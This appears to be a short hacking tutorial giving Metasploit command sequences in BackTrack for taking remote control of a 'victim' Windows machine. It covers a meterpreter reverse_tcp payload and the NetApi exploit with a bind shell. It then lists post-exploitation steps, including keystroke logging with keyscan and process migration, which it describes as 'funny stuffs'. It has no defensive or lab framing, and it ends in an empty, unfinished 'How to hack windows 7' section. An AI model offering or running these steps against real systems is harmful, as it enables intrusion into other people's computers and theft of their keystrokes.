How to remote control victim machine using Reverse_TCP in backtrack.

 

1. msfconsole    (start metasploit in backtrack)

 

2. Service postgresql start  (connect backtrack database from server)

 

3. Service metasploit start  (connect metasploit databases)

 

4. set  payload windows/meterpreter/reverse_tcp

(After performing the exploit the data run in the victim computer is known as payload.)

 

5. Show options    (show the all available options)

 

6. set Rhost victim IP  (target IP address)

 

7. set  Lhost host IP     (attacker IP address)

 

8. exploit    (performing exploit in victim computer)

 

 

List of funny stuffs after getting remote shell of victim

 

1. Ps    (show the no of process running)

2. getuid  (type of authority )

3. keyscan  start  (starting the keylogger sniffer)

4. Keyscan dump (dumping the keystroke)

5. migrate   (use to migrate from  one to another eg: type ps show attacker the list of process running then use “migrate 724” to migrating to 724)

 

 

Backtrack(NetApi)

 

1. msfconsole    (start metasploit in backtrack)

2. Service postgresql start  (connect backtrack database from server)

3. Service metasploit start  (connect metasploit databases)

4. search netapi   (searching for avilable attack)

5. set  payload windows/shell_bind_tcp  (After performing the exploit the data run in the victim computer is known as payload.)

6. Show options      (it show the all avilable options)

7. set  Rhost  victim IP  (Rhost means remote host  and victim IP means target IP )

8. exploit  (executing exploit in the victim computer)

 

How to hack windows 7 with metasploit

 

 

Step 1:

Step 2:

Step 3:

Step 4:

Step 5: